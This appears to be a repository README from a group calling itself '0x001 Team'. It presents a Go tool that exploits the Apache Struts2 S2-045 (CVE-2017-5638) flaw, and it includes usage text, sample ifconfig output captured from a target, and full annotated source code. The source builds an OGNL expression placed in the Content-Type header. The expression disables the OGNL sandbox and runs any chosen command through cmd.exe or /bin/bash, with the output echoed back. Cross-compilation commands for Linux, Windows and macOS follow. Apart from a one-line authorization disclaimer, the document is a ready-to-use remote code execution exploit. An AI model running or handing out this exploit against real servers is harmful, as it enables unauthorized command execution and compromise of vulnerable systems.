0x001 Team

s2-045-exp

Struts2 S2-045（CVE-2017-5638）远程代码执行漏洞利用程序：把 OGNL 表达式放在 Content-Type 请求头中，在目标上执行指定命令并回显输出。仅可用于获得明确授权的安全测试。

使用golang实现的一个小工具
使用方法:

system@mac:~/golang/src/s2-045$ ./main http://xxx.com/1.jsp ifconfig
200
map[Server:[Apache-Coyote/1.1] Date:[Tue, 21 Mar 2017 06:08:39 GMT]]
eth0 Link encap:Ethernet HWaddr 52:54:E4:D1:15:00
inet addr:192.168.1.8 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::5054:e4ff:fed1:1500/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:9999952 errors:0 dropped:0 overruns:0 frame:0
TX packets:6667457 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:6575210434 (6.1 GiB) TX bytes:939669875 (896.1 MiB)

源代码:

package main
import (
	"bytes"
	"flag"
	"fmt"
	"io"
	"log"
	"mime/multipart"
	"net/http"
	"os"
	"strings"
	"time"
)
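// newMultipartRequest builds a POST request to url whose body is a
// multipart/form-data document with one text field per entry of params,
// i.e. something that looks like a file upload.
//
// The multipart Content-Type (with its boundary) is deliberately NOT set on
// the returned request: the caller replaces that header with the OGNL
// payload, and only the body needs to look like an upload.
//
// Errors from the multipart writer are returned instead of discarded, so a
// truncated or unterminated body can no longer be sent silently. Fields are
// emitted in map-iteration order, which is random in Go; do not rely on a
// particular field order when passing more than one entry.
func newMultipartRequest(url string, params map[string]string) (*http.Request, error) {
	var body bytes.Buffer
	writer := multipart.NewWriter(&body)
	for key, val := range params {
		if err := writer.WriteField(key, val); err != nil {
			return nil, fmt.Errorf("writing multipart field %q: %v", key, err)
		}
	}
	// Close writes the terminating boundary; without it the body is malformed.
	if err := writer.Close(); err != nil {
		return nil, fmt.Errorf("closing multipart body: %v", err)
	}
	return http.NewRequest("POST", url, &body)
}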
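// buildPayload returns the S2-045 OGNL expression that is sent as the
// Content-Type header, with cmd spliced into the #cmd string literal.
//
// Read left to right, the expression: switches OGNL to
// DEFAULT_MEMBER_ACCESS and clears OgnlUtil's excluded package/class lists
// (the sandbox that would otherwise block the calls below); picks
// `cmd.exe /c` or `/bin/bash -c` depending on os.name; starts the command
// through java.lang.ProcessBuilder with stderr merged into stdout; and
// copies the process output into the servlet response output stream, which
// is why the command's output shows up in the HTTP response body.
//
// cmd must not contain a single quote: it is embedded verbatim inside
// '...' and a quote would terminate the literal early. main rejects such
// input before calling this.
func buildPayload(cmd string) string {
	return "%{(#nike='multipart/form-data')" +
		".(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)" +
		".(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container'])" +
		".(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))" +
		".(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear())" +
		".(#context.setMemberAccess(#dm))))" +
		".(#cmd='" + cmd + "')" +
		".(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))" +
		".(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))" +
		".(#p=new java.lang.ProcessBuilder(#cmds))" +
		".(#p.redirectErrorStream(true)).(#process=#p.start())" +
		".(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))" +
		".(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
}

// main runs the exploit: `main [-timeout d] <url> <command>`.
//
// It POSTs a small multipart body to <url> with the Content-Type header
// replaced by the OGNL payload from buildPayload, then prints the response
// status, headers and body (the body carries the command output on a
// vulnerable target). Use only against systems you are authorized to test.
//
// Compared with the first version: missing arguments produce a usage
// message instead of an opaque request error, a command containing a
// single quote is refused instead of sending a broken payload, the HTTP
// client has a timeout so a hung target cannot stall the tool forever,
// the response body is closed via defer, and the body is streamed to
// stdout rather than buffered in memory first.
func main() {
	// Default long enough for the remote command to run and its output to
	// be copied into the response, but bounded (the original had none).
	timeout := flag.Duration("timeout", 60*time.Second, "overall HTTP request timeout")
	flag.Parse()
	target := flag.Arg(0)
	cmd := flag.Arg(1)
	if target == "" || cmd == "" {
		fmt.Fprintf(os.Stderr, "usage: %s [-timeout d] <url> <command>\n", os.Args[0])
		os.Exit(2)
	}
	// cmd is embedded inside a single-quoted OGNL literal; a quote would end
	// the literal early and the server would see a malformed expression.
	if strings.Contains(cmd, "'") {
		log.Fatal("command must not contain a single quote (')")
	}

	// The multipart body makes the request look like a file upload; the
	// field name and value are irrelevant. Presumably this routes the
	// request through the server's multipart handling, where the
	// Content-Type header is evaluated — NOTE(review): confirm against the
	// S2-045 advisory; the page does not state it.
	request, err := newMultipartRequest(target, map[string]string{"Test": ""})
	if err != nil {
		log.Fatal(err)
	}
	request.Header.Set("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36")
	// Overwrites any Content-Type with the OGNL expression: this header is
	// the injection point.
	request.Header.Set("Content-Type", buildPayload(cmd))

	client := &http.Client{Timeout: *timeout}
	resp, err := client.Do(request)
	if err != nil {
		log.Fatal(err)
	}
	defer resp.Body.Close()

	fmt.Println(resp.StatusCode)
	fmt.Println(resp.Header)
	// Stream the body (the command output) straight to stdout.
	if _, err := io.Copy(os.Stdout, resp.Body); err != nil {
		log.Fatal(err)
	}
	fmt.Println()
}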

交叉编译Linux

$ GOOS=linux GOARCH=amd64 go build -ldflags "-s -w" main.go

交叉编译Windows

$ GOOS=windows GOARCH=amd64 go build -ldflags "-s -w" main.go

交叉编译Mac OSX

$ GOOS=darwin GOARCH=amd64 go build -ldflags "-s -w" main.go